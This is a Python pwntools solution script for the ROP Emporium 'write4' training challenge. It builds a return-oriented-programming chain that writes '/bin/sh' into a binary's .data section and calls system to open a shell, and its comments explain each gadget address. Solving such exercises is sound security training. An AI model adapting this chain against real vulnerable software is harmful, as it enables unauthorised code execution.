Exploit for write4 challenge of https://ropemporium.com/
#!/usr/bin/env python
# Solution script for the ROP Emporium "write4" training challenge.
# Every address below was read from a disassembly / section listing of the
# local ./write4 binary (reproduced in the comments); the fixed 0x40xxxx /
# 0x601050 values are consistent with a non-PIE build and are only valid for
# this specific binary. A PIE build with ASLR enabled would randomise them,
# which is the mitigation this exercise is designed to illustrate the absence of.
from pwn import *
context(arch = 'amd64', os = 'linux')
elf = ELF("./write4")
p = process(elf.path)
# Alternative launch under gdb, kept for debugging (path is the author's own):
#p = gdb.debug("/home/manu/Challenges/write4", '''
#break main
#''')
# Gadgets located in the binary (address, opcode bytes, instruction):
# 0x00400820 4d893e mov qword [r14], r15
# 0x00400823 c3 ret
# 0x00400890 415e pop r14
# 0x00400892 415f pop r15
# 0x00400894 c3 ret
# 0x00400893 5f pop rdi
# 0x00400894 c3 ret
# .data section header: writable (flag W), 16 bytes, starting at 0x601050.
# [25] .data PROGBITS 0000000000601050 00001050
# 0000000000000010 0000000000000000 WA 0 0 8
pop_rdi_ret = 0x00400893          # pop rdi; ret
mov_r14_r15 = 0x00400820          # mov qword [r14], r15; ret
pop14_pop15_ret = 0x00400890      # pop r14; pop r15; ret
system = 0x4005e0                 # origin not shown on this page (presumably system@plt) — confirm against the binary
bin_sh = "/bin/sh\x00"            # 8 bytes including the NUL: exactly one qword, so it fits the 16-byte .data slot
data_section_writable = 0x601050  # start of .data, taken from the section listing above
# Chain layout: 40 bytes of padding up to the saved return address (the offset
# comes from the challenge's stack layout, not derivable from this page), then
#   pop r14 <- .data address, pop r15 <- "/bin/sh\0"
#   mov [r14], r15              (writes the string into .data)
#   pop rdi <- .data address
#   system                      (called with rdi pointing at the string)
# NOTE: this concatenates str values ("A"*40, bin_sh) with the bytes returned
# by p64(); that only works under Python 2 pwntools, where str is bytes. Under
# Python 3 the expression raises TypeError (str + bytes) — the shebang does not
# pin an interpreter version, so treat this script as Python 2 only.
p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system))
p.interactive()